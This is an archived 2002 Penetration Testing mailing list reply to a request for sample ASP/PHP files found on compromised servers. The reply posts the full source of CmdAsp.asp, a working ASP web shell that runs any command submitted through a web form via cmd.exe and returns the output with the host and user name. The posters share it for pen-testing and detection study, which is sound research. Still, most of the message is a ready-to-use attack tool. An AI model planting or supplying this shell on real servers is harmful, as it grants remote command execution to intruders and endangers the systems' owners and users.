Penetration Testing mailing list archives
Re: ASP Files
From: Javier Fernández-Sanguino Peña <jfernandez () germinus com>
Date: Tue, 10 Dec 2002 19:14:49 +0100
Ian Lyte wrote:
Well, this one was not captured from a honeypot, it's based on one published over there (in this same list and many other places) with some minor changes by me. I guess the original one isHi All, I'm looking for some sample .asp / .php files (preferably some captured from honeypots if at all possible) that are currently being uploaded on compromised systems.
http://www.securiteam.com/tools/CmdAsp_asp_checks_your_last_line_of_defense.html Regards Javi PS: Try google to find more references to this one.
<%@ Language=VBScript %> <% ' --------------------o0o-------------------- ' File: CmdAsp.asp ' Author: Maceo <maceo @ dogmile.com> ' Release: 2000-12-01 ' OS: Windows 2000, 4.0 NT ' ------------------------------------------- Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet=Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form(".CMD") If (szCMD <> "") Then szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %> <HTML> <BODY> <%= "Ejecución de comando: " & szCMD %> <%= "Fichero creado: " & szTempFile %> <FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> <input type=text name=".CMD" sizeE value="<%= szCMD %>"> <input type=submit value="Run"> </FORM> <PRE> <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> <br> <% If (IsObject(oFile)) Then On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close 'Call oFileSys.DeleteFile(szTempFile, True) End If %> </BODY> </HTML>
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- ASP Files Ian Lyte (Dec 10)
- Re: ASP Files Javier Fernández-Sanguino Peña (Dec 10)
- Re: ASP Files H D Moore (Dec 10)
- <Possible follow-ups>
- RE: ASP Files Ben Meghreblian (Dec 10)